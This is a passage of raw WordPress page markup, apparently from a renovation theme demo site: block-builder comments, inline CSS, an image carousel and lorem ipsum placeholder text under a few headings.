.skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"afa0e568-68f4-4025-b8bc-c877ecbbb129\"} -->\n<style type=\"text/css\"> .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-afa0e568-68f4-4025-b8bc-c877ecbbb129 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"6a05bb6a-276d-4790-b47d-858d6f80f6d3\"} -->\n<style type=\"text/css\"> .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6a05bb6a-276d-4790-b47d-858d6f80f6d3\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"49f6ee6c-504d-4d60-938f-35ad6223261c\"} -->\n<style type=\"text/css\"> .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-49f6ee6c-504d-4d60-938f-35ad6223261c\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"2f8e1399-a394-4dc5-afcc-503ec3adb6af\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-2f8e1399-a394-4dc5-afcc-503ec3adb6af\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Fusce congue augue sollicitudin dignissim ultricies</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra eget vulputate ac, finiee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">bus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee semper lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero. Morbi rhoncus sem at ligula tempus varius. Cras erat ipsum, accpellentesque egestas a, condimen in ante. Quisque in felis quam. Cras at ultricie mi purus, viverra eget vulputate ac, finiee bus nec velit.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"1715a7e2-d9ed-427a-be77-136e8c2c931b\"} -->\n<style type=\"text/css\"> .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-1715a7e2-d9ed-427a-be77-136e8c2c931b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"efa13df2-51dc-4c44-938f-814450f36d07\"} -->\n<style type=\"text/css\"> .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-efa13df2-51dc-4c44-938f-814450f36d07\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"49885c91-6f61-4ac3-8911-3a58424dd7c7\"} -->\n<style type=\"text/css\"> .block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"baa4317a-0da5-4ce3-9276-68d750099fbb\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-baa4317a-0da5-4ce3-9276-68d750099fbb\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"8b199e02-8b7a-4370-bd4d-3421bc4a7624\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-8b199e02-8b7a-4370-bd4d-3421bc4a7624 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"44cd821a-9dd0-4ac7-9c82-f555d98e54fe\"} -->\n<style type=\"text/css\"> .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div 